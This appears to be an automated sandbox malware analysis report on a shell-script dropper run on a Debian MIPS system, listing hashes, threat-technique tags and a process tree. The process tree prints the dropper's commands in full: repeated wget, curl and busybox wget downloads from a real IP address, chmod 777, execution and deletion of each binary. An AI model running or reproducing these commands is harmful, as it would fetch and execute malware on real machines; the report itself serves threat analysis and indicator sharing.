d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-11-2024 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Size

10KB
MD5

8abf2434594ba2dffa54b25832749b54
SHA1

0e89289d57c7377b331a82fbfaca526ccd8bb78e
SHA256

d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c
SHA512

02c0ada458d3f0b7d057957c42ac1ed0493daa06e48ff877c07a7120a3cd5a5e88dc2ba46a95cc6c2752b8f570c19a697220bc733f2c8653c42d770e7aa033a1
SSDEEP

96:KVh5RKWVHduuHsnbBWwwiDcO0UCn14IuuHsnbRWwwiDqOVvhkEy1n44h5RKWVRNs:KxL8a1DrE

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 26 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
733	chmod
853	chmod
770	chmod
841	chmod
847	chmod
871	chmod
877	chmod
889	chmod
925	chmod
937	chmod
955	chmod
726	chmod
806	chmod
859	chmod
883	chmod
895	chmod
901	chmod
913	chmod
919	chmod
931	chmod
943	chmod
742	chmod
799	chmod
865	chmod
907	chmod
949	chmod

Executes dropped EXE 26 IoCs

Reads runtime system information 27 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
802	wget
803	curl
804	busybox
808	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
811	rm

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl
File opened for modification	/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl

/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
1⤵
PID:696
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:700
- /usr/bin/wget
  wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:704
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:713
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:724
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:727
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:728
- /usr/bin/wget
  wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:730
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:731
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:732
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:735
- /usr/bin/wget
  wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:736
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:738
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:743
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:747
- /usr/bin/wget
  wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:764
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:771
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:775
- /usr/bin/wget
  wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:777
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:784
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:796
- /bin/chmod
  chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Executes dropped EXE
  PID:800
- /bin/rm
  rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:801
- /usr/bin/wget
  wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:802
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:803
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:804
- /bin/chmod
  chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:808
- /bin/rm
  rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:811
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:812
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:839
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:840
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:843
- /usr/bin/wget
  wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:844
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:845
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:846
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:847
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:848
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:849
- /usr/bin/wget
  wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:850
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:851
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:852
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:853
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:854
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:855
- /usr/bin/wget
  wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:856
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:858
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:860
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:861
- /usr/bin/wget
  wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:862
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:864
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:866
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:867
- /usr/bin/wget
  wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:868
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:870
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:872
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:873
- /usr/bin/wget
  wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:874
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:876
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:879
- /usr/bin/wget
  wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:882
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:885
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:886
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:888
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:891
- /usr/bin/wget
  wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:894
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:900
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:906
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:912
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:915
- /usr/bin/wget
  wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:918
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:921
- /usr/bin/wget
  wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:924
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:927
- /usr/bin/wget
  wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:930
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:932
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:933
- /usr/bin/wget
  wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:934
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:935
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:936
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:939
- /usr/bin/wget
  wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:940
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:942
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
